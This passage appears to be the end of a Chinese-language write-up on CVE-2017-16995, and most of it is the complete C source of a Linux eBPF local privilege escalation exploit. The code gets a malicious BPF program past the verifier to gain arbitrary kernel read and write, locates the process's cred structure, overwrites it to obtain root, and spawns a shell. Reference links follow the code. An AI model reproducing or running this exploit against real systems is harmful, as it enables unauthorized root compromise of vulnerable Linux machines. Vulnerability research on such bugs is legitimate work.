# define BPF_PSEUDO_MAP_FD 1 #endif #define BPF_LD_MAP_FD(DST, MAP_FD) \ BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) #define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ ((struct bpf_insn) { \ .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = 0 }) #define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ ((struct bpf_insn) { \ .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_JMP_IMM(OP, DST, IMM, OFF) \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ .dst_reg = DST, \ .src_reg = 0, \ .off = OFF, \ .imm = IMM }) #define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \ ((struct bpf_insn) { \ .code = CODE, \ .dst_reg = DST, \ .src_reg = SRC, \ .off = OFF, \ .imm = IMM }) #define BPF_EXIT_INSN() \ ((struct bpf_insn) { \ .code = BPF_JMP | BPF_EXIT, \ .dst_reg = 0, \ .src_reg = 0, \ .off = 0, \ .imm = 0 }) #define BPF_DISABLE_VERIFIER() \ 
BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF), /* r2 = (u32)0xFFFFFFFF */ \ BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2), /* if (r2 == -1) { */ \ BPF_MOV64_IMM(BPF_REG_0, 0), /* exit(0); */ \ BPF_EXIT_INSN() /* } */ \ #define BPF_MAP_GET(idx, dst) \ BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \ BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \ BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \ BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \ BPF_EXIT_INSN(), /* exit(0); */ \ BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */ static int load_prog() { struct bpf_insn prog[] = { BPF_DISABLE_VERIFIER(), BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_1, -16), /* *(fp - 16) = r1 */ BPF_LD_MAP_FD(BPF_REG_9, mapfd), BPF_MAP_GET(0, BPF_REG_6), /* r6 = op */ BPF_MAP_GET(1, BPF_REG_7), /* r7 = address */ BPF_MAP_GET(2, BPF_REG_8), /* r8 = value */ /* store map slot address in r2 */ BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), /* r2 = r0 */ BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 for exit(0) */ BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2), /* if (op == 0) */ /* get fp */ BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3), /* else if (op == 1) */ /* get skbuff */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, -16), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 2, 3), /* else if (op == 2) */ /* read */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0), BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0), BPF_EXIT_INSN(), /* else */ /* write */ BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), BPF_EXIT_INSN(), }; return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0); } void info(const char *fmt, ...) { va_list args; va_start(args, fmt); fprintf(stdout, "[.] 
"); vfprintf(stdout, fmt, args); va_end(args); } void msg(const char *fmt, ...) { va_list args; va_start(args, fmt); fprintf(stdout, "[*] "); vfprintf(stdout, fmt, args); va_end(args); } void redact(const char *fmt, ...) { va_list args; va_start(args, fmt); if(doredact) { fprintf(stdout, "[!] ( ( R E D A C T E D ) )\n"); return; } fprintf(stdout, "[*] "); vfprintf(stdout, fmt, args); va_end(args); } void fail(const char *fmt, ...) { va_list args; va_start(args, fmt); fprintf(stdout, "[!] "); vfprintf(stdout, fmt, args); va_end(args); exit(1); } void initialize() { info("\n"); info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n"); info("\n"); info(" ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n"); info("\n"); redact("creating bpf map\n"); mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0); if (mapfd < 0) { fail("failed to create bpf map: '%s'\n", strerror(errno)); } redact("sneaking evil bpf past the verifier\n"); progfd = load_prog(); if (progfd < 0) { if (errno == EACCES) { msg("log:\n%s", bpf_log_buf); } fail("failed to load prog '%s'\n", strerror(errno)); } redact("creating socketpair()\n"); if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) { fail("failed to create socket pair '%s'\n", strerror(errno)); } redact("attaching bpf backdoor to socket\n"); if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) { fail("setsockopt '%s'\n", strerror(errno)); } } static void writemsg() { ssize_t n = write(sockets[0], buffer, sizeof(buffer)); if (n < 0) { perror("write"); return; } if (n != sizeof(buffer)) { fprintf(stderr, "short write: %d\n", n); } } static void update_elem(int key, unsigned long value) { if (bpf_update_elem(mapfd, &key, &value, 0)) { fail("bpf_update_elem failed '%s'\n", strerror(errno)); } } static unsigned long get_value(int key) { unsigned long value; if (bpf_lookup_elem(mapfd, &key, &value)) { fail("bpf_lookup_elem 
failed '%s'\n", strerror(errno)); } return value; } static unsigned long sendcmd(unsigned long op, unsigned long addr, unsigned long value) { update_elem(0, op); update_elem(1, addr); update_elem(2, value); writemsg(); return get_value(2); } unsigned long get_skbuff() { return sendcmd(1, 0, 0); } unsigned long get_fp() { return sendcmd(0, 0, 0); } unsigned long read64(unsigned long addr) { return sendcmd(2, addr, 0); } void write64(unsigned long addr, unsigned long val) { (void)sendcmd(3, addr, val); } static unsigned long find_sk_rcvtimeo() { uid_t uid = getuid(); unsigned long skbuff = get_skbuff(); /* * struct sk_buff { * [...24 byte offset...] * struct sock *sk; * }; * */ unsigned long addr = read64(skbuff + 24); msg("Leaking sock struct from %llx\n", addr); /* * scan forward for expected sk_rcvtimeo value. * * struct sock { * [...] * long sk_rcvtimeo; * }; */ for (int i = 0; i < 100; i++, addr += 8) { if(read64(addr) == 0x7FFFFFFFFFFFFFFF) { /*if(read64(addr - 24) != uid) { continue; }*/ msg("found sock->sk_rcvtimeo at offset %d\n", i * 8); return addr; } } fail("failed to find sk_rcvtimeo.\n"); } static unsigned long find_cred() { /* * struct sock { * [...] 
* const struct cred *sk_peer_cred; * long sk_rcvtimeo; * }; */ long result = read64(find_sk_rcvtimeo() - 8); msg("found sock->sk_peer_cred\n"); return result; } static void hammer_cred(unsigned long addr) { msg("hammering cred structure at %llx\n", addr); #define w64(w) { write64(addr, (w)); addr += 8; } unsigned long val = read64(addr) & 0xFFFFFFFFUL; w64(val); w64(0); w64(0); w64(0); w64(0); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); w64(0xFFFFFFFFFFFFFFFF); #undef w64 } int main(int argc, char **argv) { initialize(); hammer_cred(find_cred()); msg("credentials patched, launching shell...\n"); if(execl("/bin/sh", "/bin/sh", NULL)) { fail("exec %s\n", strerror(errno)); } } ``` ## 参考链接 [1]https://dangokyo.me/2018/05/24/analysis-on-cve-2017-16995/ [2]https://security.tencent.com/index.php/blog/msg/124 [3]https://bbs.pediy.com/thread-249033.htm [4]https://www.cnblogs.com/rebeyond/p/8921307.html